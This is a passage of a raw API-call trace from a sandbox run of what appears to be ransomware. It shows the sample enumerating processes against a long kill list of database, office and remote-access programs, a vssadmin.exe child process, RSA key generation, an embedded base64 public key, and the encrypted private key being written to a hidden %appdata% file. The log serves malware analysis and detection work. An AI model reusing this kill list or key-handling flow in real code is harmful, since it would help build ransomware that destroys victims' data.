(lpString1="taskhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.880] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0112.881] lstrcmpiW (lpString1="dllhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.881] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0112.882] lstrcmpiW (lpString1="dllhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.882] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIAPSRVR.EXE.exe")) returned 1 [0112.883] lstrcmpiW (lpString1="WMIAPSRVR.EXE.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.883] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0112.884] lstrcmpiW (lpString1="vssadmin.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.884] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.885] lstrcmpiW (lpString1="conhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.885] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.886] lstrcmpiW (lpString1="cmd.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.886] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0112.887] lstrcmpiW (lpString1="VSSVC.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.887] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.888] lstrcmpiW (lpString1="conhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.888] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.889] lstrcmpiW (lpString1="cmd.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.889] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.890] lstrcmpiW (lpString1="conhost.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.890] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.891] lstrcmpiW (lpString1="cmd.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.891] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0112.892] CloseHandle (hObject=0x210) returned 1 [0112.892] CryptAcquireContextA (in: phProv=0x39f0a0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x39f0a0*=0x7c6248) returned 1 [0113.566] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\_uninstalling_.png", lpDst=0x39f8b8, nSize=0x104 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png") returned 0x41 [0113.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_uninstalling_.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.566] CryptGenKey (in: hProv=0x7c6248, Algid=0xa400, dwFlags=0x4000001, phKey=0x39f09c | out: phKey=0x39f09c*=0x7c65a0) returned 1 [0114.343] GetProcessHeap () returned 0x780000 [0114.343] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x50) returned 0x7c9438 [0114.343] GetProcessHeap () returned 0x780000 [0114.343] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x440) returned 0x7cc090 [0114.343] CryptExportKey (in: hKey=0x7c65a0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x7cc090, pdwDataLen=0x39f0a0 | out: pbData=0x7cc090*, pdwDataLen=0x39f0a0*=0x94) returned 1 [0114.343] GetProcessHeap () returned 0x780000 [0114.343] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xd4) returned 0x7c6378 [0114.343] CryptExportKey (in: hKey=0x7c65a0, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x7cc090, pdwDataLen=0x39f0a0 | out: pbData=0x7cc090*, pdwDataLen=0x39f0a0*=0x254) returned 1 [0114.344] GetProcessHeap () returned 0x780000 [0114.344] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x294) returned 0x79f840 [0114.344] GetProcessHeap () returned 0x780000 [0114.344] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7cc090 | out: hHeap=0x780000) returned 1 [0114.344] CryptDestroyKey (hKey=0x7c65a0) returned 1 [0114.344] CryptImportKey (in: hProv=0x7c6248, pbData=0x7c6378, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0xdf44b8 | out: phKey=0xdf44b8*=0x7c65a0) returned 1 [0114.344] lstrlenA (lpString="BgIAAACkAABSU0ExABAAAAEAAQAfUDvrYL7lF1XhXKge33OTLQA33gYy0ZDOhsWwBJW0B8cSFWvgrgQmosvTFpr4r8AM3zW8414cOdDLL91XnEUOXADx/fwMxGj0Lp+gxl/qg3kKzBSAoqSA+nqyvZtgpjCyQIDIu1FSUWPSkWz8QusTTWl7k5hbf49hgnZUYRDlM+H/YQ89U4gA9oCrqzfpk7dnRjcVGvQbqZeqCLF8PkT5sTXX8uNdXAjXAMqTVcypFHuJP1SFTmjku7nYX0WS6gseq1IynsjDVLY+XEu9JJ8qt5WvYR/Vsm0Q54TuzUcqiLOZdqvR/jntTD9OAbtIk88fjh5Am0wLNXWlMqsN0TbzPSPkDZCR00iCi3uIXblUFRaTuLsj3aAlJmixgXqqYGidWTNUoXGPSDXeM9CdwKL4tF6+B3oT0zYe4xMxuW+LubuQCWh7I2I4KlqaPDBKBtYLhStq2yvW653jn2fx84pCRM+VPuqbIdyo0lOz3W4C35xRKNbQW7XPDDL9b/yU+LhIX4BCZE19Y8u6rf8bJlqwUsIJNjSEHg0KsIQg4W1qrt7uhJCtMX1+dqDCaimWuYM/hguQ7J51LDeeOei/RhvYLe4L2cn9hQ1FQTc1VcReoRBhdU1hRKQQZEesndxPdOsYje1UhuP+qy/RyP958PdtPs7u5ttzWNckR4pgN3uTnQ==") returned 712 [0114.344] GetProcessHeap () returned 0x780000 [0114.344] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x309) returned 0x79fae0 [0114.344] CryptImportKey (in: hProv=0x7c6248, pbData=0x79fae0, dwDataLen=0x214, hPubKey=0x0, dwFlags=0x0, phKey=0x39f0a0 | out: phKey=0x39f0a0*=0x7c6660) returned 1 [0114.344] GetProcessHeap () returned 0x780000 [0114.344] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79fae0 | out: hHeap=0x780000) returned 1 [0114.345] CryptEncrypt (in: hKey=0x7c6660, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39fac0*, pdwDataLen=0x39fcc8*=0x1f5, dwBufLen=0x200 | out: pbData=0x39fac0*, pdwDataLen=0x39fcc8*=0x200) returned 1 [0114.346] CryptEncrypt (in: hKey=0x7c6660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x39fac0*, pdwDataLen=0x39fcc8*=0x5f, dwBufLen=0x200 | out: pbData=0x39fac0*, pdwDataLen=0x39fcc8*=0x200) returned 1 [0114.347] GetProcessHeap () returned 0x780000 [0114.347] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x599) returned 0x7d1740 [0114.347] CryptDestroyKey (hKey=0x7c6660) returned 1 [0114.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_uninstalling_.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x6, hTemplateFile=0x0) returned 0x178 [0114.349] lstrlenA 